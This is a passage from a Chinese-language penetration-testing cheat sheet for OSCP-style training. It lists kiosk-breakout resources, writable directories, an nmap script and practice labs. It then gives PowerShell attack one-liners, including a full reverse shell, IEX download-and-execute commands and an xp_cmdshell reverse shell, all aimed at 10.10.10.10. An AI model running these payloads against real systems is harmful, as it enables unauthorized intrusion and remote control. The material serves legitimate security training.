限制](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) - [SRA.io - SiteKiosk 突破](https://sra.io/blog/sitekiosk-breakout/) - [TrustedSec - Kiosk/POS 突破按键](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/) - [NCC Group - 环境逃逸问题 (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf) - [GracefulSecurity - Citrix 突破](https://gracefulsecurity.com/citrix-breakout/) - [NetSPI - 突破应用程序限制](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) ### 可写目录 #### Windows 普通用户默认可写的目录(因操作系统版本而异): ``` C:\Windows\Tasks C:\Windows\Temp C:\windows\tracing C:\Windows\Registration\CRMLog C:\Windows\System32\FxsTmp C:\Windows\System32\com\dmp C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\PRINTERS C:\Windows\System32\spool\SERVERS C:\Windows\System32\spool\drivers\color C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter C:\Windows\System32\Tasks_Migrated C:\Windows\SysWOW64\FxsTmp C:\Windows\SysWOW64\com\dmp C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System ``` 来源:[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) #### Linux ``` find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print ``` ### Metasploit 技巧 #### 添加自定义模块 - [如何从 Exploit-DB 向 Metasploit 添加模块](https://medium.com/@pentest_it/how-to-add-a-module-to-metasploit-from-exploit-db-d389c2a33f6d) ### Nmap 自动化脚本 扫描多个 IP 并输出规整的结果(本仓库中包含的 `automap.sh`): ``` #!/bin/bash for line in $(cat ip.txt); do mkdir -p $line/screenshots nmap -sC -sV -p- -o ./$line/Full-TCP $line -Pn --min-rate 2000 done ``` ### 实验室与练习 | 类别 | 实验室 | URL | |---|---|---| | 终端技能 | OverTheWire Bandit | https://overthewire.org/wargames/bandit/ | | Web 黑客 | OverTheWire Natas | https://overthewire.org/wargames/natas/ | | XSS | Google XSS Game | https://xss-game.appspot.com/ | | XSS | PwnFunction XSS Labs | https://xss.pwnfunction.com/ | | XSS | PortSwigger XSS Labs | https://portswigger.net/web-security/cross-site-scripting | | XSS | alert(1) to win | http://alf.nu/alert1 | ### Windows 框架 / PowerShell #### 绕过执行策略 ``` powershell -ExecutionPolicy ByPass -File script.ps1 ``` #### 反弹 PowerShell ``` powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` #### 加载远程脚本 ``` # PowerUp echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile - # 通用 powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Script.ps1'); Invoke-Script" ``` #### 通过 MSSQL 实现反弹 Shell ``` xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\") ``` #### 使用 PowerShell 进行文件传输 ``` powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file', 'file') ``` **资源:** - [Nishang](https://github.com/samratashok/nishang) - PowerShell 攻击框架 - [Sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell 权限提升查找器(已弃用,请使用 Watson) ## 致谢 感谢以下人员将我的速查表收录到他们的网站/博客中: - [KhaoticDev Cheatsheets](https://khaoticdev.net/cheatsheets/#collections) - [NCyberSec Facebook Post](https://www.facebook.com/ncybersec/posts/1541830509321001) - [CyberG0100 Facebook Post](https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466) - [r/CyberSpaceVN Reddit Post](https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat) - [XN4K PWK Cheatsheet](https://xn4k.github.io/pentest/PWK-course-&-the-OSCP-Exam-Cheatsheet/) - [OpenSourceLibs Pentesting Tools](https://opensourcelibs.com/libs/pentesting-tools) - [BugBountyTips Blog](https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/) - [PythonLang OSCP Category](https://pythonlang.dev/category/oscp/)
标签:AI合规, CTI, HTTP工具, OSCP认证, Web报告查看器, 协议分析, 插件系统, 权限提升, 网络安全, 逆向工具, 速查表, 隐私保护